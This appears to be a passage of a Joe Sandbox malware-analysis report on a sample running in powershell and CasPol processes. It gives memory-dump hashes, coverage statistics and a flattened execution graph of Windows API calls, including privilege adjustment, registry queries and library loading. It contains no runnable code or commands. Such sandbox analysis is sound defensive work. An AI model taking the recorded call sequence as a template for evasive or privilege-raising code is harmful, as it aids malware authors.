                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfeb2281a58f1676ac446661899e0cef63c31899c8e100011af1ece54d9b474d
                                          • Instruction ID: 90f75531c161095d29df3128abf72c3ef8082d4e027e69578b4650c147b55aae
                                          • Opcode Fuzzy Hash: dfeb2281a58f1676ac446661899e0cef63c31899c8e100011af1ece54d9b474d
                                          • Instruction Fuzzy Hash: 3D91123091D7864FE706EB2898915E57FA0EF92760B0400BED089CF1A3EA69BC46C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46fed6240746d391d63a39ca372d936b7dab7333190b05b093899f26ca61cc7e
                                          • Instruction ID: b78686e8906c7eedb29bf35bc0a72833ffb80b98158f150b00b77cbd1ef7fd47
                                          • Opcode Fuzzy Hash: 46fed6240746d391d63a39ca372d936b7dab7333190b05b093899f26ca61cc7e
                                          • Instruction Fuzzy Hash: CF41C47061CB498FD788DE1CC8859B5B7E2FBA9750B10057DE48AC7296EB62FC42C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29eae0b6ff33b2d49d93290626b011dead1b4a4b84965552eb33d6b691e7f92d
                                          • Instruction ID: a3ee4c7a8e695fd8f689289362083a56c8fb814e8cb6208e3ab033078384054d
                                          • Opcode Fuzzy Hash: 29eae0b6ff33b2d49d93290626b011dead1b4a4b84965552eb33d6b691e7f92d
                                          • Instruction Fuzzy Hash: DF316D31A189098FDF98EF5CD895AAC77E1FF68750F140169D409DB296CE64FC82C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24ba00a0b3ed904ba1423c6eb5ec5aacd20f0bfb85cc6ccb291ea0c276a7c962
                                          • Instruction ID: 6aa5b52b2c6c46326aa4c6c4cca71307c1edb08f70fee337a4c4ae0acbabe46f
                                          • Opcode Fuzzy Hash: 24ba00a0b3ed904ba1423c6eb5ec5aacd20f0bfb85cc6ccb291ea0c276a7c962
                                          • Instruction Fuzzy Hash: 0F01847011CB0C4FD748EF0CE451AA5B3E0FB95320F10056DE58AC3251DB22E881CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2462168757.00007FF825BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF825BB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff825bb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21cb1261c9de1ffd8c3752d3c465dcbff27f4ae43a5a0a91bbdb9a8433cfa56a
                                          • Instruction ID: f228f43ff645f6517a1c8cc1ff04dadb2fa567ac15715184267ba44560cb0d7d
                                          • Opcode Fuzzy Hash: 21cb1261c9de1ffd8c3752d3c465dcbff27f4ae43a5a0a91bbdb9a8433cfa56a
                                          • Instruction Fuzzy Hash: 46F0547175CB448FDB9CDA1CE84197977D1EBD9330F10062EF08BC66D6DA26F8428646
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:28.9%
                                          Dynamic/Decrypted Code Coverage:99.9%
                                          Signature Coverage:2.9%
                                          Total number of Nodes:727
                                          Total number of Limit Nodes:21
41647 cd8aa2 11 API calls 41630->41647 41632 1f82305d 41631->41632 41648 cda991 4 API calls 41631->41648 41649 cda9f0 4 API calls 41631->41649 41633 1f8230b1 41632->41633 41650 cdac61 4 API calls 41632->41650 41651 cdaf00 4 API calls 41632->41651 41634 1f823105 41633->41634 41652 cdb558 LdrInitializeThunk 41633->41652 41634->41522 41635->41625 41636->41625 41637->41628 41638->41628 41639->41629 41640->41629 41641->41629 41642->41630 41643->41630 41644->41630 41645->41631 41646->41631 41647->41631 41648->41632 41649->41632 41650->41633 41651->41633 41652->41634 41654 1f822a2d 41653->41654 41676 1f827682 11 API calls 41654->41676 41677 1f8276e0 11 API calls 41654->41677 41655 1f822bc8 KiUserExceptionDispatcher 41657 1f822c28 41655->41657 41658 1f822e3e 41657->41658 41678 cd774f 11 API calls 41657->41678 41679 cd79e0 11 API calls 41657->41679 41659 1f822e80 41658->41659 41680 cd774f 11 API calls 41658->41680 41681 cd79e0 11 API calls 41658->41681 41682 cd7c30 11 API calls 41658->41682 41660 1f822ecb 41659->41660 41665 cd882f 11 API calls 41659->41665 41666 cd88ee 11 API calls 41659->41666 41667 cd8aa2 11 API calls 41659->41667 41661 1f822f16 41660->41661 41668 cd882f 11 API calls 41660->41668 41669 cd88ee 11 API calls 41660->41669 41670 cd8aa2 11 API calls 41660->41670 41662 1f82305d 41661->41662 41671 cda991 4 API calls 41661->41671 41672 cda9f0 4 API calls 41661->41672 41663 1f8230b1 41662->41663 41673 cdac61 4 API calls 41662->41673 41674 cdaf00 4 API calls 41662->41674 41664 1f823105 41663->41664 41675 cdb558 LdrInitializeThunk 41663->41675 41664->41522 41665->41660 41666->41660 41667->41660 41668->41661 41669->41661 41670->41661 41671->41662 41672->41662 41673->41663 41674->41663 41675->41664 41676->41655 41677->41655 41678->41658 41679->41658 41680->41659 41681->41659 41682->41659 41684 1f822cb7 41683->41684 41685 1f822e3e 41684->41685 41692 cd774f 12 API calls 41684->41692 41693 cd79e0 12 API calls 41684->41693 41686 1f822e80 41685->41686 41694 cd774f 12 API 
calls 41685->41694 41695 cd79e0 12 API calls 41685->41695 41696 cd7c30 12 API calls 41685->41696 41687 1f822ecb 41686->41687 41697 cd882f 12 API calls 41686->41697 41698 cd88ee 12 API calls 41686->41698 41699 cd8aa2 12 API calls 41686->41699 41688 1f822f16 41687->41688 41700 cd882f 12 API calls 41687->41700 41701 cd88ee 12 API calls 41687->41701 41702 cd8aa2 12 API calls 41687->41702 41689 1f82305d 41688->41689 41703 cda991 4 API calls 41688->41703 41704 cda9f0 4 API calls 41688->41704 41690 1f8230b1 41689->41690 41705 cdac61 4 API calls 41689->41705 41706 cdaf00 4 API calls 41689->41706 41691 1f823105 41690->41691 41707 cdb558 LdrInitializeThunk 41690->41707 41691->41522 41692->41685 41693->41685 41694->41686 41695->41686 41696->41686 41697->41687 41698->41687 41699->41687 41700->41688 41701->41688 41702->41688 41703->41689 41704->41689 41705->41690 41706->41690 41707->41691 41709 1f822eb2 41708->41709 41710 1f822ecb 41709->41710 41720 cd882f 12 API calls 41709->41720 41721 cd88ee 12 API calls 41709->41721 41722 cd8aa2 12 API calls 41709->41722 41711 1f822f16 41710->41711 41723 cd882f 12 API calls 41710->41723 41724 cd88ee 12 API calls 41710->41724 41725 cd8aa2 12 API calls 41710->41725 41712 1f82305d 41711->41712 41715 cda991 4 API calls 41711->41715 41716 cda9f0 4 API calls 41711->41716 41713 1f8230b1 41712->41713 41717 cdac61 4 API calls 41712->41717 41718 cdaf00 4 API calls 41712->41718 41714 1f823105 41713->41714 41719 cdb558 LdrInitializeThunk 41713->41719 41714->41522 41715->41712 41716->41712 41717->41713 41718->41713 41719->41714 41720->41710 41721->41710 41722->41710 41723->41711 41724->41711 41725->41711 41727 1f822baf 41726->41727 41754 1f827682 11 API calls 41727->41754 41755 1f8276e0 11 API calls 41727->41755 41728 1f822bc8 KiUserExceptionDispatcher 41730 1f822c28 41728->41730 41731 1f822e3e 41730->41731 41743 cd774f 11 API calls 41730->41743 41744 cd79e0 11 API calls 41730->41744 41732 1f822e80 41731->41732 41745 cd774f 11 API calls 41731->41745 
41746 cd79e0 11 API calls 41731->41746 41747 cd7c30 11 API calls 41731->41747 41733 1f822ecb 41732->41733 41748 cd882f 11 API calls 41732->41748 41749 cd88ee 11 API calls 41732->41749 41750 cd8aa2 11 API calls 41732->41750 41734 1f822f16 41733->41734 41751 cd882f 11 API calls 41733->41751 41752 cd88ee 11 API calls 41733->41752 41753 cd8aa2 11 API calls 41733->41753 41735 1f82305d 41734->41735 41738 cda991 4 API calls 41734->41738 41739 cda9f0 4 API calls 41734->41739 41736 1f8230b1 41735->41736 41740 cdac61 4 API calls 41735->41740 41741 cdaf00 4 API calls 41735->41741 41737 1f823105 41736->41737 41742 cdb558 LdrInitializeThunk 41736->41742 41737->41522 41738->41735 41739->41735 41740->41736 41741->41736 41742->41737 41743->41731 41744->41731 41745->41732 41746->41732 41747->41732 41748->41733 41749->41733 41750->41733 41751->41734 41752->41734 41753->41734 41754->41728 41755->41728 41757 1f822fa5 41756->41757 41758 1f82305d 41757->41758 41761 cda991 4 API calls 41757->41761 41762 cda9f0 4 API calls 41757->41762 41759 1f8230b1 41758->41759 41763 cdac61 4 API calls 41758->41763 41764 cdaf00 4 API calls 41758->41764 41760 1f823105 41759->41760 41765 cdb558 LdrInitializeThunk 41759->41765 41760->41522 41761->41758 41762->41758 41763->41759 41764->41759 41765->41760 41767 1f822e25 41766->41767 41768 1f822e3e 41767->41768 41780 cd774f 12 API calls 41767->41780 41781 cd79e0 12 API calls 41767->41781 41769 1f822e80 41768->41769 41782 cd774f 12 API calls 41768->41782 41783 cd79e0 12 API calls 41768->41783 41784 cd7c30 12 API calls 41768->41784 41770 1f822ecb 41769->41770 41785 cd882f 12 API calls 41769->41785 41786 cd88ee 12 API calls 41769->41786 41787 cd8aa2 12 API calls 41769->41787 41771 1f822f16 41770->41771 41788 cd882f 12 API calls 41770->41788 41789 cd88ee 12 API calls 41770->41789 41790 cd8aa2 12 API calls 41770->41790 41772 1f82305d 41771->41772 41775 cda991 4 API calls 41771->41775 41776 cda9f0 4 API calls 41771->41776 41773 1f8230b1 41772->41773 41777 cdac61 4 
API calls 41772->41777 41778 cdaf00 4 API calls 41772->41778 41774 1f823105 41773->41774 41779 cdb558 LdrInitializeThunk 41773->41779 41774->41522 41775->41772 41776->41772 41777->41773 41778->41773 41779->41774 41780->41768 41781->41768 41782->41769 41783->41769 41784->41769 41785->41770 41786->41770 41787->41770 41788->41771 41789->41771 41790->41771 41792 1f821dba 41791->41792 41794 1f82296c 41792->41794 42150 1f824b91 41792->42150 41793 1f8229e3 41794->41793 41795 1f824b91 12 API calls 41794->41795 42154 1f824e88 41794->42154 41795->41794 41799 1f823098 41798->41799 41800 1f8230b1 41799->41800 41801 cdac61 4 API calls 41799->41801 41802 cdaf00 4 API calls 41799->41802 41803 cdb558 LdrInitializeThunk 41800->41803 41804 1f823105 41800->41804 41801->41800 41802->41800 41803->41804 41804->41522 41806 1f821d8b 41805->41806 41808 1f82296c 41806->41808 41811 1f824b91 12 API calls 41806->41811 41807 1f8229e3 41808->41807 41809 1f824b91 12 API calls 41808->41809 41810 1f824e88 12 API calls 41808->41810 41809->41808 41810->41808 41811->41808 41813 1f822b10 41812->41813 41838 1f827682 11 API calls 41813->41838 41839 1f8276e0 11 API calls 41813->41839 41814 1f822bc8 KiUserExceptionDispatcher 41816 1f822c28 41814->41816 41817 1f822e3e 41816->41817 41827 cd774f 11 API calls 41816->41827 41828 cd79e0 11 API calls 41816->41828 41818 1f822e80 41817->41818 41829 cd774f 11 API calls 41817->41829 41830 cd79e0 11 API calls 41817->41830 41831 cd7c30 11 API calls 41817->41831 41819 1f822ecb 41818->41819 41832 cd882f 11 API calls 41818->41832 41833 cd88ee 11 API calls 41818->41833 41834 cd8aa2 11 API calls 41818->41834 41820 1f822f16 41819->41820 41835 cd882f 11 API calls 41819->41835 41836 cd88ee 11 API calls 41819->41836 41837 cd8aa2 11 API calls 41819->41837 41821 1f82305d 41820->41821 41840 cda991 4 API calls 41820->41840 41841 cda9f0 4 API calls 41820->41841 41822 1f8230b1 41821->41822 41824 cdac61 4 API calls 41821->41824 41825 cdaf00 4 API calls 41821->41825 41823 1f823105 
41822->41823 41826 cdb558 LdrInitializeThunk 41822->41826 41823->41522 41824->41822 41825->41822 41826->41823 41827->41817 41828->41817 41829->41818 41830->41818 41831->41818 41832->41819 41833->41819 41834->41819 41835->41820 41836->41820 41837->41820 41838->41814 41839->41814 41840->41821 41841->41821 41843 1f822d8f 41842->41843 41844 1f822e3e 41843->41844 41859 cd774f 12 API calls 41843->41859 41860 cd79e0 12 API calls 41843->41860 41845 1f822e80 41844->41845 41861 cd774f 12 API calls 41844->41861 41862 cd79e0 12 API calls 41844->41862 41863 cd7c30 12 API calls 41844->41863 41846 1f822ecb 41845->41846 41864 cd882f 12 API calls 41845->41864 41865 cd88ee 12 API calls 41845->41865 41866 cd8aa2 12 API calls 41845->41866 41847 1f822f16 41846->41847 41851 cd882f 12 API calls 41846->41851 41852 cd88ee 12 API calls 41846->41852 41853 cd8aa2 12 API calls 41846->41853 41848 1f82305d 41847->41848 41854 cda991 4 API calls 41847->41854 41855 cda9f0 4 API calls 41847->41855 41849 1f8230b1 41848->41849 41856 cdac61 4 API calls 41848->41856 41857 cdaf00 4 API calls 41848->41857 41850 1f823105 41849->41850 41858 cdb558 LdrInitializeThunk 41849->41858 41850->41522 41851->41847 41852->41847 41853->41847 41854->41848 41855->41848 41856->41849 41857->41849 41858->41850 41859->41844 41860->41844 41861->41845 41862->41845 41863->41845 41864->41846 41865->41846 41866->41846 41868 1f822d02 41867->41868 41869 1f822e3e 41868->41869 41881 cd774f 12 API calls 41868->41881 41882 cd79e0 12 API calls 41868->41882 41870 1f822e80 41869->41870 41883 cd774f 12 API calls 41869->41883 41884 cd79e0 12 API calls 41869->41884 41885 cd7c30 12 API calls 41869->41885 41871 1f822ecb 41870->41871 41886 cd882f 12 API calls 41870->41886 41887 cd88ee 12 API calls 41870->41887 41888 cd8aa2 12 API calls 41870->41888 41872 1f822f16 41871->41872 41889 cd882f 12 API calls 41871->41889 41890 cd88ee 12 API calls 41871->41890 41891 cd8aa2 12 API calls 41871->41891 41873 1f82305d 41872->41873 41876 cda991 4 API calls 
41872->41876 41877 cda9f0 4 API calls 41872->41877 41874 1f8230b1 41873->41874 41878 cdac61 4 API calls 41873->41878 41879 cdaf00 4 API calls 41873->41879 41875 1f823105 41874->41875 41880 cdb558 LdrInitializeThunk 41874->41880 41875->41522 41876->41873 41877->41873 41878->41874 41879->41874 41880->41875 41881->41869 41882->41869 41883->41870 41884->41870 41885->41870 41886->41871 41887->41871 41888->41871 41889->41872 41890->41872 41891->41872 41893 1f822c03 KiUserExceptionDispatcher 41892->41893 41895 1f822c28 41893->41895 41896 1f822e3e 41895->41896 41908 cd774f 11 API calls 41895->41908 41909 cd79e0 11 API calls 41895->41909 41897 1f822e80 41896->41897 41910 cd774f 11 API calls 41896->41910 41911 cd79e0 11 API calls 41896->41911 41912 cd7c30 11 API calls 41896->41912 41898 1f822ecb 41897->41898 41913 cd882f 11 API calls 41897->41913 41914 cd88ee 11 API calls 41897->41914 41915 cd8aa2 11 API calls 41897->41915 41899 1f822f16 41898->41899 41916 cd882f 11 API calls 41898->41916 41917 cd88ee 11 API calls 41898->41917 41918 cd8aa2 11 API calls 41898->41918 41900 1f82305d 41899->41900 41903 cda991 4 API calls 41899->41903 41904 cda9f0 4 API calls 41899->41904 41901 1f8230b1 41900->41901 41905 cdac61 4 API calls 41900->41905 41906 cdaf00 4 API calls 41900->41906 41902 1f823105 41901->41902 41907 cdb558 LdrInitializeThunk 41901->41907 41902->41522 41903->41900 41904->41900 41905->41901 41906->41901 41907->41902 41908->41896 41909->41896 41910->41897 41911->41897 41912->41897 41913->41898 41914->41898 41915->41898 41916->41899 41917->41899 41918->41899 41920 1f822efd 41919->41920 41921 1f822f16 41920->41921 41925 cd882f 12 API calls 41920->41925 41926 cd88ee 12 API calls 41920->41926 41927 cd8aa2 12 API calls 41920->41927 41922 1f82305d 41921->41922 41928 cda991 4 API calls 41921->41928 41929 cda9f0 4 API calls 41921->41929 41923 1f8230b1 41922->41923 41930 cdac61 4 API calls 41922->41930 41931 cdaf00 4 API calls 41922->41931 41924 1f823105 41923->41924 41932 cdb558 
LdrInitializeThunk 41923->41932 41924->41522 41925->41921 41926->41921 41927->41921 41928->41922 41929->41922 41930->41923 41931->41923 41932->41924 41934 1f822ff0 41933->41934 41935 1f82305d 41934->41935 41938 cda991 4 API calls 41934->41938 41939 cda9f0 4 API calls 41934->41939 41936 1f8230b1 41935->41936 41940 cdac61 4 API calls 41935->41940 41941 cdaf00 4 API calls 41935->41941 41937 1f823105 41936->41937 41942 cdb558 LdrInitializeThunk 41936->41942 41937->41522 41938->41935 41939->41935 41940->41936 41941->41936 41942->41937 41944 1f822e70 41943->41944 41945 1f822e80 41944->41945 41959 cd774f 12 API calls 41944->41959 41960 cd79e0 12 API calls 41944->41960 41961 cd7c30 12 API calls 41944->41961 41946 1f822ecb 41945->41946 41962 cd882f 12 API calls 41945->41962 41963 cd88ee 12 API calls 41945->41963 41964 cd8aa2 12 API calls 41945->41964 41947 1f822f16 41946->41947 41951 cd882f 12 API calls 41946->41951 41952 cd88ee 12 API calls 41946->41952 41953 cd8aa2 12 API calls 41946->41953 41948 1f82305d 41947->41948 41954 cda991 4 API calls 41947->41954 41955 cda9f0 4 API calls 41947->41955 41949 1f8230b1 41948->41949 41956 cdac61 4 API calls 41948->41956 41957 cdaf00 4 API calls 41948->41957 41950 1f823105 41949->41950 41958 cdb558 LdrInitializeThunk 41949->41958 41950->41522 41951->41947 41952->41947 41953->41947 41954->41948 41955->41948 41956->41949 41957->41949 41958->41950 41959->41945 41960->41945 41961->41945 41962->41946 41963->41946 41964->41946 41966 1f8230ec 41965->41966 41967 1f823105 41966->41967 41968 cdb558 LdrInitializeThunk 41966->41968 41967->41522 41968->41967 41970 1f822a68 41969->41970 41986 1f827682 11 API calls 41970->41986 41987 1f8276e0 11 API calls 41970->41987 41971 1f822bc8 KiUserExceptionDispatcher 41973 1f822c28 41971->41973 41974 1f822e3e 41973->41974 41988 cd774f 11 API calls 41973->41988 41989 cd79e0 11 API calls 41973->41989 41975 1f822e80 41974->41975 41990 cd774f 11 API calls 41974->41990 41991 cd79e0 11 API calls 41974->41991 41992 
cd7c30 11 API calls 41974->41992 41976 1f822ecb 41975->41976 41993 cd882f 11 API calls 41975->41993 41994 cd88ee 11 API calls 41975->41994 41995 cd8aa2 11 API calls 41975->41995 41977 1f822f16 41976->41977 41996 cd882f 11 API calls 41976->41996 41997 cd88ee 11 API calls 41976->41997 41998 cd8aa2 11 API calls 41976->41998 41978 1f82305d 41977->41978 41981 cda991 4 API calls 41977->41981 41982 cda9f0 4 API calls 41977->41982 41979 1f8230b1 41978->41979 41983 cdac61 4 API calls 41978->41983 41984 cdaf00 4 API calls 41978->41984 41980 1f823105 41979->41980 41985 cdb558 LdrInitializeThunk 41979->41985 41980->41522 41981->41978 41982->41978 41983->41979 41984->41979 41985->41980 41986->41971 41987->41971 41988->41974 41989->41974 41990->41975 41991->41975 41992->41975 41993->41976 41994->41976 41995->41976 41996->41977 41997->41977 41998->41977 42000 1f822c63 41999->42000 42001 1f822e3e 42000->42001 42013 cd774f 12 API calls 42000->42013 42014 cd79e0 12 API calls 42000->42014 42002 1f822e80 42001->42002 42015 cd774f 12 API calls 42001->42015 42016 cd79e0 12 API calls 42001->42016 42017 cd7c30 12 API calls 42001->42017 42003 1f822ecb 42002->42003 42018 cd882f 12 API calls 42002->42018 42019 cd88ee 12 API calls 42002->42019 42020 cd8aa2 12 API calls 42002->42020 42004 1f822f16 42003->42004 42021 cd882f 12 API calls 42003->42021 42022 cd88ee 12 API calls 42003->42022 42023 cd8aa2 12 API calls 42003->42023 42005 1f82305d 42004->42005 42008 cda991 4 API calls 42004->42008 42009 cda9f0 4 API calls 42004->42009 42006 1f8230b1 42005->42006 42010 cdac61 4 API calls 42005->42010 42011 cdaf00 4 API calls 42005->42011 42007 1f823105 42006->42007 42012 cdb558 LdrInitializeThunk 42006->42012 42007->41522 42008->42005 42009->42005 42010->42006 42011->42006 42012->42007 42013->42001 42014->42001 42015->42002 42016->42002 42017->42002 42018->42003 42019->42003 42020->42003 42021->42004 42022->42004 42023->42004 42025 1f822dda 42024->42025 42026 1f822e3e 42025->42026 42038 cd774f 12 API 
calls 42025->42038 42039 cd79e0 12 API calls 42025->42039 42027 1f822e80 42026->42027 42040 cd774f 12 API calls 42026->42040 42041 cd79e0 12 API calls 42026->42041 42042 cd7c30 12 API calls 42026->42042 42028 1f822ecb 42027->42028 42043 cd882f 12 API calls 42027->42043 42044 cd88ee 12 API calls 42027->42044 42045 cd8aa2 12 API calls 42027->42045 42029 1f822f16 42028->42029 42046 cd882f 12 API calls 42028->42046 42047 cd88ee 12 API calls 42028->42047 42048 cd8aa2 12 API calls 42028->42048 42030 1f82305d 42029->42030 42033 cda991 4 API calls 42029->42033 42034 cda9f0 4 API calls 42029->42034 42031 1f8230b1 42030->42031 42035 cdac61 4 API calls 42030->42035 42036 cdaf00 4 API calls 42030->42036 42032 1f823105 42031->42032 42037 cdb558 LdrInitializeThunk 42031->42037 42032->41522 42033->42030 42034->42030 42035->42031 42036->42031 42037->42032 42038->42026 42039->42026 42040->42027 42041->42027 42042->42027 42043->42028 42044->42028 42045->42028 42046->42029 42047->42029 42048->42029 42050 1f8276a1 42049->42050 42051 1f8276c4 42049->42051 42050->41550 42123 1f824fa0 42051->42123 42053 1f827730 42053->41550 42055 1f827706 42054->42055 42056 1f824fa0 12 API calls 42055->42056 42057 1f827730 42056->42057 42057->41550 42059 cd7a06 42058->42059 42060 cd7c15 42059->42060 42061 cd882f 12 API calls 42059->42061 42062 cd88ee 12 API calls 42059->42062 42063 cd8aa2 12 API calls 42059->42063 42060->41553 42061->42060 42062->42060 42063->42060 42065 cd7771 42064->42065 42066 cd7794 42064->42066 42065->41553 42066->41553 42067 cd77c1 42066->42067 42068 cd882f 12 API calls 42066->42068 42069 cd88ee 12 API calls 42066->42069 42070 cd8aa2 12 API calls 42066->42070 42067->41553 42068->42067 42069->42067 42070->42067 42072 cd7c51 42071->42072 42073 cd7c74 42071->42073 42072->41554 42074 cd7cd9 42073->42074 42075 cd882f 12 API calls 42073->42075 42076 cd88ee 12 API calls 42073->42076 42077 cd8aa2 12 API calls 42073->42077 42074->41554 42075->42074 42076->42074 42077->42074 42079 cd8866 
42078->42079 42083 1f824fa0 12 API calls 42079->42083 42084 1f8252aa 12 API calls 42079->42084 42085 1f825038 12 API calls 42079->42085 42080 cd8ada 42080->41555 42081 cd887e 42081->42080 42082 1f82d720 12 API calls 42081->42082 42082->42081 42083->42081 42084->42081 42085->42081 42087 cd88b1 42086->42087 42088 cd8ada 42087->42088 42089 1f82d720 12 API calls 42087->42089 42088->41555 42089->42087 42091 cd88b1 42090->42091 42092 cd8ada 42091->42092 42093 1f82d720 12 API calls 42091->42093 42092->41555 42093->42091 42095 cda9a8 42094->42095 42096 cda9b1 42094->42096 42095->42096 42097 cdac61 4 API calls 42095->42097 42096->41557 42097->42096 42099 cdaa14 42098->42099 42100 cdaa26 42099->42100 42101 cdac61 4 API calls 42099->42101 42100->41557 42101->42100 42103 cdaf11 42102->42103 42107 cdaf34 42102->42107 42103->41558 42104 cdaf61 42104->41558 42107->41558 42107->42104 42108 1fe314cb RegQueryValueExW 42107->42108 42109 1fe3150e RegQueryValueExW 42107->42109 42142 1fe31402 42107->42142 42146 1fe313e2 42107->42146 42108->42107 42109->42107 42112 cdac8d 42110->42112 42111 cdaecf 42111->41558 42112->41558 42112->42111 42113 1fe31402 RegOpenKeyExW 42112->42113 42114 1fe313e2 RegOpenKeyExW 42112->42114 42115 1fe314cb RegQueryValueExW 42112->42115 42116 1fe3150e RegQueryValueExW 42112->42116 42113->42112 42114->42112 42115->42112 42116->42112 42119 cdb562 42117->42119 42120 cdb50b 42117->42120 42118 cdb579 42118->41559 42119->42118 42121 cdb5ee LdrInitializeThunk 42119->42121 42120->41559 42122 cdb60a 42121->42122 42127 1f824fa0 12 API calls 42123->42127 42130 1f8252aa 42123->42130 42134 1f825038 42123->42134 42124 1f824fc5 42125 1f8252e2 42124->42125 42138 1f82d720 42124->42138 42125->42053 42127->42124 42132 1f824ff8 42130->42132 42131 1f8252e2 42131->42124 42132->42131 42133 1f82d720 12 API calls 42132->42133 42133->42132 42137 1f824ff8 42134->42137 42135 1f8252e2 42135->42124 42136 1f82d720 12 API calls 42136->42137 42137->42135 42137->42136 42141 1f82d729 42138->42141 
42139 1f82dac0 42139->42124 42140 1f821518 12 API calls 42140->42141 42141->42139 42141->42140 42144 1fe3143a RegOpenKeyExW 42142->42144 42145 1fe3147e 42144->42145 42145->42107 42147 1fe31402 RegOpenKeyExW 42146->42147 42149 1fe3147e 42147->42149 42149->42107 42151 1f824a80 42150->42151 42151->42150 42152 1f824e62 42151->42152 42153 1f824fa0 12 API calls 42151->42153 42152->41794 42153->42152 42155 1f824e99 42154->42155 42156 1f824ebc 42154->42156 42155->41794 42157 1f824f09 42156->42157 42158 1f824fa0 12 API calls 42156->42158 42157->41794 42158->42157 42159 1d45a4b6 42160 1d45a4e2 SetErrorMode 42159->42160 42162 1d45a50b 42159->42162 42161 1d45a4f7 42160->42161 42162->42160 42163 1d45aab6 42166 1d45aae5 AdjustTokenPrivileges 42163->42166 42165 1d45ab07 42166->42165 42167 1d45af32 42168 1d45af82 K32GetModuleBaseNameW 42167->42168 42169 1d45af8a 42168->42169 42170 1fe3071a 42171 1fe30746 FindClose 42170->42171 42172 1fe30778 42170->42172 42173 1fe3075b 42171->42173 42172->42171 42174 1d45bebe 42177 1d45bef9 LoadLibraryA 42174->42177 42176 1d45bf36 42177->42176 42178 cd4b30 42179 cd4b54 LdrInitializeThunk 42178->42179 42181 cd4ba6 42179->42181
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-2445308728
                                          • Opcode ID: fd88fa5526de173d6dfe3514cdf67040d6e23750ea5455c5c82581f6716f574a
                                          • Instruction ID: c6f009a8ec3bdaa064f386b99c548efb8ecc730cb02b7dccd76c3a30f9901373
                                          • Opcode Fuzzy Hash: fd88fa5526de173d6dfe3514cdf67040d6e23750ea5455c5c82581f6716f574a
                                          • Instruction Fuzzy Hash: FCF27E70A012148FEB54DB79C894BAEB7F2AF84300F1581AAD61AEB391EF34DD41CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$d$d$*r
                                          • API String ID: 0-1591864158
                                          • Opcode ID: 642e55a7924c06f674111b54181711207bf7e7c0a93eecc43f32edfa7de5fd85
                                          • Instruction ID: 3fa14484c28794bb458c46a2c72077232661905d1cb1c14faa7d63c8ff376848
                                          • Opcode Fuzzy Hash: 642e55a7924c06f674111b54181711207bf7e7c0a93eecc43f32edfa7de5fd85
                                          • Instruction Fuzzy Hash: 77D3B275D00A299FDB65CF69C844AC9BBF2BF89300F0581E5E90CAB261D771AE85CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Figure: control-flow graph; legend: Executed, Not Executed]
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: r$ r$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-988043974
                                          • Opcode ID: 0d7b979bb3c96d0d23bd9686a2a1f70e27cec9b22326975a6c5ab4073b13fe9f
                                          • Instruction ID: 2cd5f0c58d16396f1c455888d7444bef5633e68fc24d18f1635a39e37e2de86f
                                          • Opcode Fuzzy Hash: 0d7b979bb3c96d0d23bd9686a2a1f70e27cec9b22326975a6c5ab4073b13fe9f
